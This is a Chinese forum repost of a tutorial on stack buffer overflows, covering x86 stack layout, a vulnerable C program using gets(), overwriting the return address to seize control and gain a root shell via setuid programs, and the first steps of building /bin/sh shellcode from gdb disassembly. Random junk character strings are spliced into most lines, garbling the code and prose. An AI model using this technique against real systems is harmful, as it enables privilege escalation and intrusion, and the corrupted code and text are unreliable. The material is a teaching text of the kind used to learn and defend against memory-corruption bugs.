EDA365欢迎您登录!
您需要 登录 才可以下载或查看,没有帐号?注册
x
堆栈溢出技术从入门到精通4 ~5 h/ b. y# F
& |7 S9 w& G4 E) m虽然溢出在程序开发过程中不可完全避免,但溢出对系统的威胁是巨大的,由于系统的特殊性,溢出发生时攻击者可以利用其漏洞来获取系统的高级权限root,因此本文将详细介绍堆栈溢出技术…… 在您开始了解堆栈溢出前,首先你应该了解win32汇编语言,熟悉寄存器的组成和功能。你必须有堆栈和存储分配方面的基础知识,有关这方面的计算机书籍很多,我将只是简单阐述原理,着重在应用。其次,你应该了解linux,本讲中我们的例子将在linux上开发。 1、首先复习一下基础知识。 从物理上讲,堆栈是就是一段连续分配的内存空间。在一个程序中,会声明各种变量。静态全局变量是位于数据段并且在程序开始运行的时候被加载。而程序的动态的局部变量则分配在堆栈里面。 从操作上来讲,堆栈是一个先入后出的队列。他的生长方向与内存的生长方向正好相反。我们规定内存的生长方向为向上,则栈的生长方向为向下。压栈的操作push=ESP-4,出栈的操作是pop=ESP+4.换句话说,堆栈中老的值,其内存地址,反而比新的值要大。请牢牢记住这一点,因为这是堆栈溢出的基本理论依据。 在一次函数调用中,堆栈中将被依次压入:参数,返回地址,EBP。如果函数有局部变量,接下来,就在堆栈中开辟相应的空间以构造变量。函数执行结束,这些局部变量的内容将被丢失。但是不被清除。在函数返回的时候,弹出EBP,恢复堆栈到函数调用的地址,弹出返回地址到EIP以继续执行程序。 在C语言程序中,参数的压栈顺序是反向的。比如func(a,b,c)。在参数入栈的时候,是:先压c,再压b,最后a。在取参数的时候,由于栈的先入后出,先取栈顶的a,再取b,最后取c。这些是汇编语言的基础知识,用户在开始前必须要了解这些知识。 2、现在我们来看一看什么是堆栈溢出。 运行时的堆栈分配 堆栈溢出就是不顾堆栈中数据块大小,向该数据块写入了过多的数据,导致数据越界,结果覆盖了老的堆栈数据。 例如程序一: #include
' n; L' t6 `* r: Oint main ( )
6 D" h M% K3 t: ]$ b2 d{
( V3 z5 Q" `2 M4 \char name[8]; ) n) b$ h, y( b9 _; A5 N: t) ~
printf("Please type your name: "); D9 S' h! P+ O
gets(name); ( g+ C7 |. [. S1 X3 A5 J
printf("Hello, %s!", name);
. M6 T( B; L0 x5 _0 o% nreturn 0; : a; _ ]6 c' {# ~/ a+ j3 l4 ?
} |
编译并且执行,我们输入ipxodi,就会输出Hello,ipxodi!。程序运行中,堆栈是怎么操作的呢? 在main函数开始运行的时候,堆栈里面将被依次放入返回地址,EBP。 我们用gcc -S 来获得汇编语言输出,可以看到main函数的开头部分对应如下语句: pushl %ebp 2 [3 }: k0 _$ o! v( n
movl %esp,%ebp 7 E& [: ]8 p8 E% e: D5 j' Q
subl $8,%esp |
首先他把EBP保存下来,,然后EBP等于现在的ESP,这样EBP就可以用来访问本函数的局部变量。之后ESP减8,就是堆栈向上增长8个字节,用来存放name[]数组。最后,main返回,弹出ret里的地址,赋值给EIP,CPU继续执行EIP所指向的指令。 堆栈溢出 现在我们再执行一次,输入ipxodiAAAAAAAAAAAAAAA,执行完gets(name)之后,由于我们输入的name字符串太长,name数组容纳不下,只好向内存顶部继续写‘A’。由于堆栈的生长方向与内存的生长方向相反,这些‘A’覆盖了堆栈的老的元素。 我们可以发现,EBP,ret都已经被‘A’覆盖了。在main返回的时候,就会把‘AAAA’的ASCII码:0x41414141作为返回地址,CPU会试图执行0x41414141处的指令,结果出现错误。这就是一次堆栈溢出。 3、如何利用堆栈溢出 我们已经制造了一次堆栈溢出。其原理可以概括为:由于字符串处理函数(gets,strcpy等等)没有对数组越界加以监视和限制,我们利用字符数组写越界,覆盖堆栈中的老元素的值,就可以修改返回地址。 在上面的例子中,这导致CPU去访问一个不存在的指令,结果出错。事实上,当堆栈溢出的时候,我们已经完全的控制了这个程序下一步的动作。如果我们用一个实际存在指令地址来覆盖这个返回地址,CPU就会转而执行我们的指令。 在UINX/linux系统中,我们的指令可以执行一个shell,这个shell将获得和被我们堆栈溢出的程序相同的权限。如果这个程序是setuid的,那么我们就可以获得root shell。下一讲将叙述如何书写一个shell code。 如何书写一个shell code 一:shellcode基本算法分析 在程序中,执行一个shell的程序是这样写的: shellcode.c a) m- c" [- ]" R. E
------------------------------------------------------------------------ 7 W% @. W, R# @7 ]2 T1 L9 Q
#include ' I5 z; t; A7 ]" r t0 P) G
void main() {
8 y* l9 e& B* ]9 a- echar *name[2]; * {1 p* q, j* Z' J D, w0 A. q
name[0] = "/bin/sh"
3 }8 t3 f- B u8 e! Zname[1] = NULL; 4 h" G: i5 B: W% q3 M
execve(name[0], name, NULL); . b9 n2 V- Z/ ?' M
} 3 H( ]& E5 H8 y, z$ A. n# }. ~
------------------------------------------------------------------------ |
execve函数将执行一个程序。他需要程序的名字地址作为第一个参数。一个内容为该程序的argv(argv[n-1]=0)的指针数组作为第二个参数,以及(char*) 0作为第三个参数。 我们来看以看execve的汇编代码: [nkl10]$Content$nbsp;gcc -o shellcode -static shellcode.c x: C4 `0 `! s- Y
[nkl10]$Content$nbsp;gdb shellcode 3 p4 r B+ m& f$ B" G) k& ^
(gdb) disassemble __execve
$ B4 F; z6 h0 T9 V( _Dump of assembler code for function __execve: b% k4 f. ?) Y; j; Y) P
0x80002bc <__execve>: pushl %ebp ;
. h/ U0 P4 T' Q/ D0 z$ s! M0x80002bd <__execve+1>: movl %esp,%ebp % g: \1 _9 J- T4 Q
;上面是函数头。 9 d1 t0 ]4 Y0 U8 k$ z# I+ r/ ?, S
0x80002bf <__execve+3>: pushl %ebx * O/ u# E# |. h. M! Z5 P
;保存ebx " x' d2 J& v7 }
0x80002c0 <__execve+4>: movl $0xb,%eax + k- ^ t+ v, i; P" d) M* M* z
;eax=0xb,eax指明第几号系统调用。
9 e1 i: F% P0 [7 E! |5 t# |0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx 0 f8 M! h+ [; d. J0 p% U! m
;ebp+8是第一个参数"/bin/sh\0"
6 a, |3 B9 z9 u) f0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx 5 g0 G0 {0 R* u2 b% e, x
;ebp+12是第二个参数name数组的地址 9 P: g0 |# c& A" Q) t' }( i
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
- d+ t1 _' `! ~;ebp+16是第三个参数空指针的地址。
/ y3 u- n2 P! ]1 N n) I;name[2-1]内容为NULL,用来存放返回值。
# Q9 {( w7 N. s) B* W! v* k0x80002ce <__execve+18>: int $0x80
7 A6 X" T/ Q1 Z' T;执行0xb号系统调用(execve)
2 f0 J2 l8 k( A; y3 B# F0x80002d0 <__execve+20>: movl %eax,%edx
4 @" u1 l3 ?. Q5 O/ l2 {' a* `;下面是返回值的处理就没有用了。 & V4 e& ^" p, Q1 F; f* E8 i! V9 W
0x80002d2 <__execve+22>: testl %edx,%edx
, R9 C9 ?5 Z1 z6 Z) @3 U: i* c9 c0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
1 x4 |) i4 Z2 w0x80002d6 <__execve+26>: negl %edx ( Q" S8 F# b' ], V& K
0x80002d8 <__execve+28>: pushl %edx
: ]7 E+ o" |8 ~: J2 W0x80002d9 <__execve+29>: call 0x8001a34 7 h' }# C6 o" D, K+ A
<__normal_errno_location>
! z# D( s5 n# P* c" l- ?0x80002de <__execve+34>: popl %edx % t% t% \: a: [0 C5 I, O$ A/ G
0x80002df <__execve+35>: movl %edx,(%eax) . L6 h5 z; w/ H( s; s
0x80002e1 <__execve+37>: movl $0xffffffff,%eax . b/ X' g( t+ r6 ~4 i8 u. {
0x80002e6 <__execve+42>: popl %ebx
" c0 N/ j7 F5 v" d- D. v7 y' a# {' V0x80002e7 <__execve+43>: movl %ebp,%esp
- P7 A7 D+ w+ z4 J0x80002e9 <__execve+45>: popl %ebp
# m; P- |9 ^! E+ N# J% H2 K; w0x80002ea <__execve+46>: ret ' _' Z: ~& z/ A3 l. X0 c
0x80002eb <__execve+47>: nop
- p# W! `+ ^7 S- m7 {End of assembler dump. |
经过以上的分析,可以得到如下的精简指令算法: movl $execve的系统调用号,%eax $ ?$ T8 |5 r$ f
movl "bin/sh\0"的地址,%ebx . c4 W/ X7 J; N& e+ E% j( i
movl name数组的地址,%ecx
& I& g4 k) _/ ^9 C6 K' `+ imovl name[n-1]的地址,%edx ' v2 z$ l7 ~* ]
int $0x80 ;执行系统调用(execve) |
当execve执行成功后,程序shellcode就会退出,/bin/sh将作为子进程继续执行。可是,如果我们的execve执行失败,(比如没有/bin/sh这个文件),CPU就会继续执行后续的指令,结果不知道跑到哪里去了。所以必须再执行一个exit()系统调用,结束shellcode.c的执行。 我们来看以看exit(0)的汇编代码: (gdb) disassemble _exit
; d8 N+ G9 ^9 M1 X' ~Dump of assembler code for function _exit:
* I+ W& o( U& j5 M# z0x800034c <_exit>: pushl %ebp
' C6 f/ E& _2 w% f0x800034d <_exit+1>: movl %esp,%ebp 3 r' T7 O) P2 |
0x800034f <_exit+3>: pushl %ebx 1 T! t0 `, v8 q$ F" x1 Q6 ?. u/ o
0x8000350 <_exit+4>: movl $0x1,%eax ;1号系统调用
( B% _* |- X4 r# @ Y2 @ h! R' {0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx ;ebx为参数0
4 l4 F, P; }/ k0x8000358 <_exit+12>: int $0x80 ;引发系统调用 ; D- O- L# i* F1 |' A# M& T
0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx
# j/ O5 P$ P: b0x800035d <_exit+17>: movl %ebp,%esp . R3 j5 P, g0 W+ S5 k
0x800035f <_exit+19>: popl %ebp
6 S) W( V, P+ N0 A; ]0x8000360 <_exit+20>: ret ; T, C' P s8 f) a; C5 L
0x8000361 <_exit+21>: nop
5 r6 T$ \. M6 a5 ]" y# S. p2 P0x8000362 <_exit+22>: nop & E* T: m, O, @7 |% }+ o3 M7 M
0x8000363 <_exit+23>: nop 7 }! P6 a; u8 G% w- [1 N
End of assembler dump. |
看来exit(0)〕的汇编代码更加简单: movl $0x1,%eax ;1号系统调用 & c# a' _# ~9 O1 [
movl 0,%ebx ;ebx为exit的参数0
I6 K4 d& g% Vint $0x80 ;引发系统调用 |
那么总结一下,合成的汇编代码为: movl $execve的系统调用号,%eax ; ^9 d+ B. m7 {9 n& w( w1 J" A4 o
movl "bin/sh\0"的地址,%ebx
% Y; v5 d8 n: ~4 x: {- |movl name数组的地址,%ecx
* k8 ?4 a* G3 r" b6 jmovl name[n-1]的地址,%edx % {' X ]) q- A% w X1 Y( `/ h
int $0x80 ;执行系统调用(execve)
' e# |; l9 U7 ?$ [3 S# ^( }' E' T! d" R9 imovl $0x1,%eax ;1号系统调用 3 n* L7 B; g# x9 v
movl 0,%ebx ;ebx为exit的参数0
t5 ]! L4 m" d* s7 Mint $0x80 ;执行系统调用(exit) | , D, `5 Q1 ^. p: h! v$ [
|